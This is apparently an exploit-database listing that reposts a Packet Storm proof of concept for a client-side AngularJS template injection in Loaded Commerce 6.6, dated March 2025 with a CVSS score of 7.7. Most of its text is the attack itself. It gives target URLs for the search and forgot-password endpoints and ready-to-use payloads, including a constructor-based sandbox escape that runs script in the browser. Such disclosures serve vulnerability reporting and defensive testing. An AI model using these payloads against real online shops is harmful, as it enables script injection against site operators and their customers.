Exploit for Loaded Commerce 6.6 Client-Side Template Injection

Name: Exploit for Loaded Commerce 6.6 Client-Side Template Injection
Rating: 5 (106 reviews)

2025-03-14 | CVSS 7.7

## https://sploitus.com/exploit?id=PACKETSTORM:189805
# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection(CSTI) (AngularJS)
    # Date: 03/13/2025
    # Exploit Author: tmrswrr
    # Vendor Homepage: https://loadedcommerce.com/
    # Version: 6.6
    # Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
    
    Injecting {{7*7}} into the search parameter 
    https://target/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
    returns 49, confirming a template injection vulnerability.
    
    Forgot Password:
    Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
    https://target/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
    triggers an alert, demonstrating client-side code execution.